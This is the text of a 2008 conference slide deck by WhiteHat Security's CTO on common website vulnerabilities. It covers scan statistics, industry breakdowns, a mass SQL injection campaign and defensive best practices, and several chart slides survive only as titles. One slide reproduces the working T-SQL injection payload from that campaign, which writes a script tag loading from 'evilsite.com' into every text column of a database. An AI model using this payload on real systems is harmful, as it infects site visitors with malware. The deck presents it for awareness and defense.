Top Website Vulnerabilities: “Trends, Effects on Governmental Cyber Jeremiah Grossman

Top Website Vulnerabilities:
“Trends, Effects on Governmental Cyber
Security, How to Fight Them.”
Jeremiah Grossman
WhiteHat Security founder & CTO
© 2008 WhiteHat Security, Inc.
2
Jeremiah Grossman
WhiteHat Security Founder & CTO
Technology R&D and industry evangelist
(InfoWorld's CTO Top 25 for 2007)
Frequent international conference speaker
Co-founder of the Web Application Security Consortium
Co-author: Cross-Site Scripting Attacks
Former Yahoo! information security officer
© 2008 WhiteHat Security, Inc.
Official Title
“the hacker yahoo”
Job Description:
Hack Everything!
3
Protect this website and the ~599 others
Find the
vulnerabilities
before the
bad guys
4
5
6
WhiteHat Sentinel
• Unlimited Assessments – customer controlled and
expert managed – the ability to scan websites no matter
how big or how often they change
• Coverage – authenticated scans to identify technical
vulnerabilities and custom testing to uncover business
logical flaws
• Virtually Eliminate False Positives – Operations Team
verifies results and assigns the appropriate severity and
threat rating
• Development and QA – WhiteHat Satellite Appliance
allows us to service intranet accessible systems
remotely
• Improvement & Refinement – real-world scans enable
fast and efficient updates
© 2008 WhiteHat Security, Inc.
7
Custom Web Applications, Custom Vulnerabilities
Vulnerability Stack
WhiteHat
Security
“well-known”
vulnerabilities
Symantec
Qualys
Nessus
nCircle
Data is unique from reports distributed by Symantec, Mitre (CVE), IBM (ISS) X-Force, SANS, and others.
These organizations track publicly disclosed vulnerabilities in commercial and open source software
products, which may contain Web application flaws as well. WhiteHat Security’s data is different because it
focuses solely on previously unknown vulnerabilities in custom web applications, code unique to that
organization, on real-world websites
© 2008 WhiteHat Security, Inc.
168,000,000
websites
millions more added per month
8
809,000 websites
use SSL
protecting password, credit card
numbers, social security numbers,
and our email (if we’re lucky).
9
9 out of 10 websites
have vulnerabilities
allowing hackers unauthorized access
10
hacked
11
Over 79% of websites hosting
malicious code are legitimate
(compromised by attackers)
A new infected Web page is discovered every:
5 seconds
24 hours a day
365 days a year
12
WhiteHat Security: Top 10
Likelihood that a website has a
vulnerability, by Class
© 2008 WhiteHat Security, Inc.
13
But how bad is it really?
Likelihood that a website has a
vulnerability, by severity
Websites with Urgent, Critical, or High severity issues technically
would not pass PCI compliance
© 2008 WhiteHat Security, Inc.
14
Another way to look at the badness
Percentage of vulnerabilities ranked
by severity
© 2008 WhiteHat Security, Inc.
15
Overall vulnerability population
© 2008 WhiteHat Security, Inc.
16
Technology Breakdown
file extensions
© 2008 WhiteHat Security, Inc.
17
Industry Verticals
18
Percentage of websites with either URGENT,
CIRTICAL or HIGH severity vulnerabilities
ranked by industry
© 2008 WhiteHat Security, Inc.
Worst of the Worst
Percentage of vulnerability classes in overall
population ranked by industry
© 2008 WhiteHat Security, Inc.
19
20
Data input correlation
Average inputs per website:154
Ratio of vulnerability/inputs: 2.2%
© 2008 WhiteHat Security, Inc.
Average Time to Fix in Days
180 270
21
365
More major websites were launched before
significant classes of attack were “well-known”
Website
Founded
Vulnerability
Attack
Amazon
1994
Buffer Overflow
1996
Yahoo
1995
Command
Injection
1996
eBay
1995
SQL Injection
2004
Bank of
America
1997
XSS
2005
Google
1998
Predictable
Resource Location
?
MySpace
2003
HTTP Response
Splitting
2005 / ?
YouTube
2005
CSRF
22
?
If there’s just 1 vulnerability on
90% of the SSL websites...
Other reports say an average of 7
728,100
total vulnerabilities
23
XSSed.com has reported:
20,843 total vulnerabilities
1,072 fixed (5%)
24
25
Mass SQL Injection
1. Google recon for weak websites
(*.asp, *.php)
2. Generic SQL Injection populates
databases with malicious JavaScript
IFRAMEs.
3. Visitors arrive (U.N., DHS, etc.)
and their browser auto-connects to a
malware server infecting their
machine with trojans.
4. Botnets form with then continue
SQL injecting websites
26
DECLARE @T varchar(255), @C varchar(255);
DECLARE Table_Cursor CURSOR FOR
SELECT a.name, b.name
FROM sysobjects a, syscolumns b
WHERE a.id = b.id AND a.xtype = 'u' AND
(b.xtype = 99 OR
b.xtype = 35 OR
b.xtype = 231 OR
b.xtype = 167);
OPEN Table_Cursor;
FETCH NEXT FROM Table_Cursor INTO @T, @C;
WHILE (@@FETCH_STATUS = 0) BEGIN
EXEC(
'update [' + @T + '] set [' + @C + '] =
rtrim(convert(varchar,[' + @C + ']))+
''<script src=http://evilsite.com/1.js></script>'''
);
FETCH NEXT FROM Table_Cursor INTO @T, @C;
END;
CLOSE Table_Cursor;
DEALLOCATE Table_Cursor;
27
28
2006, 0.3% of all Internet queries return at
least one URL containing malicious content.
2007 - 1.3%
2008 - ?
29
30
31
32
Best Practices
Asset Tracking – Find your websites, assign a responsible party,
and rate their importance to the business. Because you can’t
secure what you don’t know you own.
Measure Security – Perform rigorous and on-going vulnerability
assessments, preferably every week. Because you can’t secure
what you can’t measure.
Development Frameworks – Provide programmers with software
development tools enabling them to write code rapidly that also
happens to be secure. Because, you can’t mandate secure code,
only help it.
Defense-in-Depth – Throw up as many roadblocks to attackers as
possible. This includes custom error messages, Web application
firewalls, security with obscurity, and so on. Because 9 in 10
websites are already insecure, no need to make it any easier.
© 2008 WhiteHat Security, Inc.
Thank You
For more information visit: www.whitehatsec.com/
Jeremiah Grossman, founder and CTO
blog: http://jeremiahgrossman.blogspot.com/
email: [email protected]